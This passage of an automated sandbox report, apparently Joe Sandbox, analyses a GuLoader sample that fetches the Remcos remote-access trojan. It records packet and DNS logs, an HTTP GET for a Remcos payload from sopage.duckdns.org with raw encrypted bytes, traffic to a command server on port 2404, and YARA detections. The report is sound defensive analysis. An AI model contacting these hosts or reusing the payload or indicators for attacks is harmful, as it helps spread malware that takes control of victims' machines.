Sep 27, 2021 10:59:47.321614981 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321640968 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321652889 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321685076 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321702957 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321718931 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321723938 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321748018 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321760893 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321784973 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321813107 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321816921 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321836948 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321850061 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321885109 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321892023 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321907997 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321923018 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321945906 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321974993 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321976900 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322015047 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322031975 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322062969 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322092056 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322103024 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322161913 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322207928 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322226048 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322257042 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322264910 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322288990 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322313070 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322320938 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322333097 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322355032 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322371006 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322398901 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322421074 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322431087 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322448969 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322467089 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322487116 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322504044 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322535992 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322540045 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322566986 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322573900 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322593927 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322603941 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322668076 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322686911 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322721958 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322755098 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322772026 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322782993 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322813988 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322814941 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322845936 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322851896 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322880030 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322901964 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322917938 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322932959 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322937965 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.322969913 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.322990894 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323002100 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323024988 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323026896 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323052883 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323075056 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323084116 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323129892 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323131084 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323159933 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323168039 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323183060 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323204041 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323216915 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323251963 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323252916 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323278904 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323282003 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323304892 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323307037 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.323331118 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.323358059 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.544085026 CEST	49829	2404	192.168.2.4	23.146.242.71
Sep 27, 2021 10:59:47.656651020 CEST	2404	49829	23.146.242.71	192.168.2.4
Sep 27, 2021 10:59:47.656871080 CEST	49829	2404	192.168.2.4	23.146.242.71
Sep 27, 2021 10:59:47.658245087 CEST	49829	2404	192.168.2.4	23.146.242.71
Sep 27, 2021 10:59:47.821716070 CEST	2404	49829	23.146.242.71	192.168.2.4
Sep 27, 2021 10:59:47.957165003 CEST	2404	49829	23.146.242.71	192.168.2.4
Sep 27, 2021 10:59:47.959990978 CEST	49829	2404	192.168.2.4	23.146.242.71
Sep 27, 2021 10:59:48.116199970 CEST	2404	49829	23.146.242.71	192.168.2.4
Sep 27, 2021 10:59:57.961760044 CEST	2404	49829	23.146.242.71	192.168.2.4
Sep 27, 2021 10:59:57.963074923 CEST	49829	2404	192.168.2.4	23.146.242.71
Sep 27, 2021 10:59:58.131542921 CEST	2404	49829	23.146.242.71	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 10:55:43.547386885 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:55:43.568686008 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 27, 2021 10:56:16.208640099 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:56:16.238595009 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 27, 2021 10:56:52.018357038 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:56:52.036250114 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 27, 2021 10:56:53.979378939 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:56:53.999665022 CEST	53	55854	8.8.8.8	192.168.2.4
Sep 27, 2021 10:56:56.096577883 CEST	64549	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:56:56.170964003 CEST	53	64549	8.8.8.8	192.168.2.4
Sep 27, 2021 10:56:56.789237022 CEST	63153	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:56:56.805994034 CEST	53	63153	8.8.8.8	192.168.2.4
Sep 27, 2021 10:56:57.569608927 CEST	52991	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:56:57.628201008 CEST	53	52991	8.8.8.8	192.168.2.4
Sep 27, 2021 10:56:59.870285034 CEST	53700	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:56:59.884049892 CEST	53	53700	8.8.8.8	192.168.2.4
Sep 27, 2021 10:57:00.406658888 CEST	51726	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:57:00.471741915 CEST	53	51726	8.8.8.8	192.168.2.4
Sep 27, 2021 10:57:01.776452065 CEST	56794	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:57:01.884234905 CEST	53	56794	8.8.8.8	192.168.2.4
Sep 27, 2021 10:57:03.995960951 CEST	56534	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:57:04.020252943 CEST	53	56534	8.8.8.8	192.168.2.4
Sep 27, 2021 10:57:05.849982023 CEST	56627	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:57:05.863204956 CEST	53	56627	8.8.8.8	192.168.2.4
Sep 27, 2021 10:57:06.645034075 CEST	56621	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:57:06.659590006 CEST	53	56621	8.8.8.8	192.168.2.4
Sep 27, 2021 10:57:07.133625031 CEST	63116	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:57:07.147277117 CEST	53	63116	8.8.8.8	192.168.2.4
Sep 27, 2021 10:57:46.642829895 CEST	64078	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:57:46.655601978 CEST	53	64078	8.8.8.8	192.168.2.4
Sep 27, 2021 10:57:49.210418940 CEST	64801	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:57:49.248955965 CEST	53	64801	8.8.8.8	192.168.2.4
Sep 27, 2021 10:59:46.285010099 CEST	61721	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:59:46.401027918 CEST	53	61721	8.8.8.8	192.168.2.4
Sep 27, 2021 10:59:47.428427935 CEST	51255	53	192.168.2.4	8.8.8.8
Sep 27, 2021 10:59:47.542846918 CEST	53	51255	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 10:59:46.285010099 CEST	192.168.2.4	8.8.8.8	0xfa1f	Standard query (0)	sopage.duckdns.org	A (IP address)	IN (0x0001)
Sep 27, 2021 10:59:47.428427935 CEST	192.168.2.4	8.8.8.8	0x266d	Standard query (0)	solex-wave.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 27, 2021 10:59:46.401027918 CEST	8.8.8.8	192.168.2.4	0xfa1f	No error (0)	sopage.duckdns.org		23.146.242.85	A (IP address)	IN (0x0001)
Sep 27, 2021 10:59:47.542846918 CEST	8.8.8.8	192.168.2.4	0x266d	No error (0)	solex-wave.duckdns.org		23.146.242.71	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

sopage.duckdns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49828	23.146.242.85	80	C:\Users\user\Desktop\466XoziOLD.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 10:59:46.529064894 CEST	9718	OUT	GET /Remcos_s_bChlcwVW46.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: sopage.duckdns.org Cache-Control: no-cache
Sep 27, 2021 10:59:46.644090891 CEST	9720	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Sun, 26 Sep 2021 08:50:35 GMT Accept-Ranges: bytes ETag: "694a3892b3b2d71:0" Server: Microsoft-IIS/8.5 Date: Mon, 27 Sep 2021 08:59:38 GMT Content-Length: 469056 Data Raw: e7 da 56 c8 54 c9 89 52 51 a6 5c 88 94 c5 ea f4 9c 2e 9a 90 3d e6 03 a9 bf b7 5d b0 c5 1a 2a 8b 40 14 e9 68 e5 98 9f 59 f8 c2 5e 89 9f e7 c3 3a 26 8c e3 f4 bb 03 ff 27 ec 82 4a c5 d1 21 ce fa a5 74 ce 44 bd 76 77 6d 5c 9e bc 42 e6 c0 d4 38 c5 bf 78 4b 0c a3 39 1d 14 84 20 a3 8f 73 f7 a1 ac a5 93 1f ad c1 6f 93 15 af a4 17 d5 19 eb 90 6c 7e 36 0e 32 0c 12 c9 cb 0a 03 eb 4e 18 f4 0d 1b ec 5c 48 67 e3 2b e7 cf af 67 1a 0b 1b e3 c6 c4 8f f3 3d f1 f4 b6 4e 4e 26 15 2d 8a f7 b9 b9 22 24 55 31 3b 56 8d 9c b9 41 55 2c b0 b9 98 37 d2 f1 cc 9b 87 07 02 38 eb 68 b6 0c 1a 1b 12 45 4d 36 c9 6e 49 7f 94 0c c8 bb 69 e2 f9 28 09 e9 9c 36 c3 b0 e6 2b df 74 04 7a 67 0a 09 55 b9 bd 02 38 17 8a 3b d6 37 de d7 c6 3d 43 ae 3d 95 8e 32 26 23 a9 16 3f ab 93 70 78 dd 15 5b c3 97 e2 3b 34 a0 03 b8 1a be 74 de fd cb 4c f0 6a d4 ba 03 bb 35 43 51 fa 6c 20 18 c3 13 6f 52 3f db d7 7b 4c 69 98 c1 82 83 13 22 29 10 86 90 ad b4 9d 0a 52 d3 bb 1b 45 df a5 fd 29 ad 5e 6c fe fa 38 48 c1 ab 3f 4e 27 d5 f6 a7 ba 87 2d 73 2e d3 be ae 8a 2e 33 db af 9e 83 38 47 a3 a1 0a 53 09 3c cc d1 c0 e9 e6 d3 1e f5 c3 40 9c cf ac 32 a6 ef 00 17 75 0b 00 39 32 78 ed b5 32 17 fc 70 2c 89 ba 1c c8 25 36 cb f9 9f 83 bd 20 53 75 10 cd a3 d9 b2 ab 92 29 ce 65 31 2d 62 d5 4b 53 4a 4b 29 4c 98 4f 25 0a c9 a3 89 c1 b2 e3 e8 74 92 9b 51 f9 02 fc 94 4d dc dc 0f 5e 74 52 c9 4b 18 7d 48 e7 df 86 df e8 cc 66 2a 75 f2 a8 3f 10 88 2e 23 64 bd 12 d6 a2 c3 de 80 35 7b 79 89 27 b1 1f 50 38 09 2a 89 4f 81 8b 6e a4 37 62 1a 9d 13 49 f3 df c3 35 42 96 24 9b 7f c7 42 3d f8 6a f1 cd c0 91 c5 94 1d a4 09 af 34 c3 94 51 a7 48 14 59 33 54 30 60 33 78 55 f3 2c 0a ff 4a 23 d9 92 90 2e e5 d3 d5 87 6f ee cc ae 52 b4 b6 9c a3 9e a3 62 75 42 62 2d e1 48 84 fc 62 c8 87 b4 22 d1 e0 ca d0 03 2c aa 97 fb d8 71 8e 24 98 36 ac 1c 93 c3 2d 74 2c 50 74 5b cc 6d ab c9 9d b7 46 91 0d 24 94 76 6b 94 77 19 92 82 c8 b0 cf c8 a2 50 68 7f d8 77 d4 7c e4 28 f2 1e 98 2d 7b b3 a1 41 de 1d fe 59 91 3c e0 ce de 77 bd fc de ab f2 17 43 18 4b 50 31 e8 65 14 2f 6a 50 ed 4d a9 bf c1 7e a2 76 21 68 b2 c9 34 a0 e7 dd f5 7a e9 64 33 7d c9 34 26 f8 e3 f7 b0 ad b0 af 35 6d 18 30 24 59 4b cf d0 ec de 80 d3 b2 2d 36 49 53 dc 1b a7 e2 0c d3 5d 05 80 c5 04 cc 56 8a a2 62 10 f3 dd 7c 14 6e 7a 9b 22 2e ab 94 6e 2f fd bd a4 1e 69 bc 6f 75 8a c3 30 13 1f cf 8e a7 c4 b6 6e a6 e6 94 b4 bf fd 8e d2 36 c9 a3 74 e5 00 19 22 00 9a e3 f5 2b 43 31 b6 76 5b cb cf b8 06 bc 92 d2 a0 2f 13 a7 60 9c a2 6a a9 fb f9 44 57 1d b3 05 99 5e ad 39 7c b1 36 e9 e3 fb 77 a3 09 4f e7 42 2a 2e 42 a0 e5 80 4e c9 83 88 18 2e da 4f c4 70 51 2e 50 25 77 cf b3 30 fc d4 5d d5 93 1b 1c 36 bb 05 b0 89 6c 53 a6 63 76 82 49 c0 00 02 5e 88 5c 5a bc f8 d9 ee f1 a2 2a a1 60 b3 18 70 fc e1 72 dc d2 53 6e db f9 f4 56 a7 14 88 24 a9 ab f0 0f a9 6c 39 e0 eb 86 5e 8c 5f 4c 00 f8 ee 69 7f 64 c1 13 a4 db 3b 19 a0 94 c7 ba 72 01 fb 1b 5d 79 46 e8 2e 5e 44 be 76 77 6d 58 9e bc 42 19 3f d4 38 7d bf 78 4b 0c a3 39 1d 54 84 20 a3 8f 73 f7 a1 ac a5 93 1f ad c1 6f 93 15 af a4 17 d5 19 eb 90 6c 7e 36 0e 32 0c 12 c9 cb 0a 03 eb 5e 19 f4 0d 15 f3 e6 46 67 57 22 2a ee 17 66 56 c6 3a b7 ae ad fc d3 4d 83 9b d1 3c 2f 4b 35 4e eb 99 d7 d6 56 04 37 54 1b 24 f8 f2 99 28 3b 0c f4 f6 cb 17 bf 9e a8 fe a9 0a 0f 32 cf 68 b6 0c 1a 1b 12 45 e7 b5 8b 5e a7 9d b8 6f 26 59 45 81 17 ca 25 8a c6 f1 fe 13 5c c9 1b 74 51 Data Ascii: VTRQ\.=]@hY^:&'J!tDvwm\B8xK9 sol~62N\Hg+g=NN&-"$U1;VAU,78hEM6nIi(6+tzgU8;7=C=2&#?px[;4tLj5CQl oR?{Li")RE)^l8H?N'-s..38GS<@2u92x2p,%6 Su)e1-bKSJK)LO%tQM^tRK}Hfu?.#d5{y'P8On7bI5B$B=j4QHY3T0`3xU,J#.oRbuBb-Hb",q$6-t,Pt[mF$vkwPhw\|(-{AY<wCKP1e/jPM~v!h4zd3}4&5m0$YK-6IS]Vb\|nz".n/iou0n6t"+C1v[/`jDW^9\|6wOB.BN.OpQ.P%w0]6lScvI^\Z`prSnV$l9^_Lid;r]yF.^DvwmXB?8}xK9T sol~62^FgW"fV:M</K5NV7T$(;2hE^o&YE%\tQ
Sep 27, 2021 10:59:46.644130945 CEST	9721	IN	Data Raw: 04 b8 01 61 90 d0 de b0 cc 2d eb cb 6d d8 04 c8 9c d3 20 a9 6a a9 ed 42 0c f9 ed bf dd 6f 84 41 c6 f2 2e 6c 98 af 40 a8 88 61 fe 7c f8 92 7f 30 66 a6 2e d4 d6 1c db e4 78 49 4a ea f0 3d a7 f4 21 67 af b3 1d b1 b4 c1 a1 a4 d9 7e 60 af 18 1b b2 86 Data Ascii: a-m jBoA.l@a\|0f.xIJ=!g~`q\|s>@&3?1D>3ssQehx(@A``,MAkOQuKp0(UlJH\|0pjg4vBnfB?
Sep 27, 2021 10:59:46.644157887 CEST	9723	IN	Data Raw: 42 56 67 05 cd ac f1 94 6c b6 b9 18 dd d5 53 f0 3e d6 5e 1b f0 be 28 10 2d e7 0c 00 0d 2f c5 a1 dd 10 e7 a6 d3 c2 06 d4 28 8e 82 35 d9 2b 13 d6 48 ea c8 30 01 a0 e1 d2 f1 bb 47 d5 1b 8f 10 e8 45 65 45 57 5f 11 1a 90 b9 4f 37 83 c6 f5 d3 30 66 ea Data Ascii: BVglS>^(-/(5+H0GEeEW_O70fBu3OmK@>tgH W;@#'8mf]~=Hu5:>"QswHxuv+I Xeik+A)]P{/*%E&S;P#6azHS
Sep 27, 2021 10:59:46.644182920 CEST	9724	IN	Data Raw: ee 87 26 96 ab bd 62 16 0b 41 e3 e9 79 7c e8 d9 e4 21 01 e6 a5 b7 45 df 4c 67 3e cd 4b df 7e f1 ee 7b 8a 63 43 96 2c 92 59 96 01 b3 be b7 9b 96 f3 ee fd d9 7d e2 1b 4d ec 44 a4 34 8d b3 11 0d 1e a9 ab 3f 4e 67 84 7f e2 5e 04 ed 57 a7 96 46 01 da Data Ascii: &bAy\|!ELg>K~{cC,Y}MD4?Ng^WF{daPX)LBuE9e&(0\|fFIBjY)BbY!-$`\_ntG3e^5b/TozF6}>-wO*Wn)rJ3e
Sep 27, 2021 10:59:46.756012917 CEST	9725	IN	Data Raw: a8 13 b8 91 04 3b 6c 03 80 c5 13 0c 08 d7 60 66 10 99 dd 16 15 86 72 9f 22 6e 68 c1 25 ed cb 88 46 27 12 eb e4 bc b3 38 44 49 85 c9 e4 a6 28 59 6d a6 78 19 7f 57 e3 8c d2 36 99 28 bb 0d 16 1b 22 40 ca 0b 6a 15 31 42 9d 4c df 0b bb ff 1b 31 d7 da Data Ascii: ;l`fr"nh%F'8DI(YmxW6("@j1BL1+COjrXOUq9\|N",et;-Mc5~^H/v((8Y 0ydbv(^761*`2S} >j9`@He)0 ;%^yF[Vp-iX7Gb
Sep 27, 2021 10:59:46.756086111 CEST	9727	IN	Data Raw: 20 b6 ee c1 e5 7f c4 dd f6 2d b3 3f dd f4 f2 78 2a f9 bf bb 3e 09 ed 3e 95 b8 3e 54 66 1e d8 a0 fe 2c 74 6f 28 73 2e d3 e0 a3 0d 2a 33 c2 25 75 d5 61 75 e6 c8 81 a2 5e d4 7a d2 c0 e9 8d 1d 98 34 bc 54 6d ba a0 c0 ae 12 ff e2 5c f3 8b f7 65 2e 18 Data Ascii: -?x>>>Tf,to(s.3%uau^z4Tm\e.t0))'kW\|z2xD@Kc; Y?nf#r};]H@s.On/@I2Gvz-[HZO'~p>
Sep 27, 2021 10:59:46.756149054 CEST	9728	IN	Data Raw: 48 6d 1f 64 c9 07 e2 c8 9d a9 9d bb e5 b7 e8 16 a6 57 ed bd 88 ff 2b e8 1b da bf 65 68 f8 0d 32 85 ef de d2 86 c7 f3 82 ed 1f de b8 79 43 4f 82 77 5d 95 88 39 f5 bb 22 15 38 cb 71 78 52 c6 83 ee bd 6f bd a0 6a 4f 73 2a de a6 a5 78 bd 45 d5 0b bf Data Ascii: HmdW+eh2yCOw]9"8qxRojOsxE!q:qU08NVN}K}s#X>IyS=P7Ywi`\|7JLh_L\|,ZpNW7D>}9Pu(cZEl,`9d
Sep 27, 2021 10:59:46.756213903 CEST	9730	IN	Data Raw: a1 b5 ad 9e a5 fc 7f 1d 9d 83 36 15 93 97 81 98 e1 1d 3c 2e 3f 62 ce 3b f2 03 37 be 19 82 50 78 4b 54 f0 e2 88 80 45 c5 6d 26 ab c9 d5 4a 3f 35 a7 65 ec d3 b8 2d bd 3a 32 55 6b 5a cf ac 8a 99 05 4b 18 45 55 6d 79 45 ab d9 ba 92 2b b4 d8 8c 15 74 Data Ascii: 6<.?b;7PxKTEm&J?5e-:2UkZKEUmyE+t]Y;9:ycd.r(3#\|9vT3SvhCn;)UK8zGARwJg8d, lfo8n7k^6@^f3roPuxn\GeGc(h_jw?9>/
Sep 27, 2021 10:59:46.756279945 CEST	9731	IN	Data Raw: 59 54 17 3f 5f d7 38 5f a7 52 73 95 5c ab 06 31 5b e2 c6 0d 71 d7 a8 39 7c 58 c5 a9 e3 fb 64 06 26 22 d8 c5 ba dd bd cf 22 f5 42 42 1d dc f0 07 15 b0 3b fb 71 a3 88 cd 12 22 4c cf 75 91 a1 5e 9b 90 cd fd fe 11 d9 5a e5 1e aa e8 be 75 98 fb ca 0d Data Ascii: YT?_8_Rs\1[q9\|Xd&""BB;q"Lu^ZuJ\Zs":U\|"3X,`}sM$k[3O_kLf?4c'u H\|7Lxm{'O*/=o{1xNd6_6HQ&Gk
Sep 27, 2021 10:59:46.756341934 CEST	9733	IN	Data Raw: c6 62 90 e8 9e cf e8 7f a4 20 02 74 d3 b8 31 de 6f 56 60 7c f2 ab 95 2b 49 90 61 cc b2 21 5c c1 12 8b ce d7 ae 5f 4a 90 1f c0 c5 cf 75 44 24 7f d4 2e cc d1 e2 0b ff 9e 6d 64 5a b4 0a 61 90 05 9c 34 a4 85 8b bd 90 12 e3 67 b7 92 cf 79 aa f4 24 9a Data Ascii: b t1oV`\|+Ia!\_JuD$.mdZa4gy$#rkn<]D9&G&8duv GVQ)/w+P<I,Pnx,%Rcz,HnCWZ>(#)u81#f!+xk&L
Sep 27, 2021 10:59:46.756402969 CEST	9734	IN	Data Raw: 30 dd 80 4e 96 8d d4 93 cb bd 8c 95 fb ea c4 db 68 9f 27 2d c2 03 2b 04 bf 93 71 1c 9e 9c e4 f0 89 a0 06 2d 8f 2b 6b 0e c0 00 02 08 03 ad b2 1e 0a 26 11 7a 64 74 63 68 b3 4d fb 10 1e 07 cc 3a 8a 9f 24 06 ad dd ea 1c d8 db dc a7 18 3c a9 6c 39 bd Data Ascii: 0Nh'-+q-+k&zdtchM:$<l9(;[$k p"J8}O{UwyZl]6WW^LlW"*bVk</`f< x}_~W2ZWO^

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 466XoziOLD.exe PID: 6952 Parent PID: 5912

General

Start time:	10:55:48
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\466XoziOLD.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\466XoziOLD.exe'
Imagebase:	0x400000
File size:	196608 bytes
MD5 hash:	84ADE48E59ED36C620D254D325F355D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 466XoziOLD.exe PID: 6324 Parent PID: 6952

General

Start time:	10:57:52
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\466XoziOLD.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\466XoziOLD.exe'
Imagebase:	0x400000
File size:	196608 bytes
MD5 hash:	84ADE48E59ED36C620D254D325F355D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 466XoziOLD.exe PID: 6952 Parent PID: 5912 466XoziOLD.exeCOMMON

Executed Functions

Function 02B8CB37, Relevance: 19.1, APIs: 2, Strings: 8, Instructions: 1584COMMON

Download Yara Rule

Strings

>#>Z, xrefs: 02B885B4
-{=V, xrefs: 02B882C0
>#>Z, xrefs: 02B885AF
6L<0, xrefs: 02B88966
ed[, xrefs: 02B8B349
dg, xrefs: 02B87C7F
%Ge, xrefs: 02B87F1D
rfR, xrefs: 02B88495

Memory Dump Source

Source File: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: %Ge$-{=V$6L<0$>#>Z$>#>Z$dg$rfR$ed[
API String ID: 3389902171-4250797709
Opcode ID: b1d9a6e4cc2a60b861c7f9c7d9d4001999cfe6a7298c46a7979aeec2f2fc6d8b
Instruction ID: 548160269ec96896caedcf4628a95617d134a7f422858775cf80931b8f337db6
Opcode Fuzzy Hash: b1d9a6e4cc2a60b861c7f9c7d9d4001999cfe6a7298c46a7979aeec2f2fc6d8b
Instruction Fuzzy Hash: 30D2247160438A8FDB35AF38CD947DA7BA2EF56350F55825ECC8D8B295D3308586CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02B8D818, Relevance: 13.3, APIs: 1, Strings: 6, Instructions: 1030COMMON

Download Yara Rule

Strings

>#>Z, xrefs: 02B885B4
-{=V, xrefs: 02B882C0
>#>Z, xrefs: 02B885AF
dg, xrefs: 02B87C7F
%Ge, xrefs: 02B87F1D
rfR, xrefs: 02B88495

Memory Dump Source

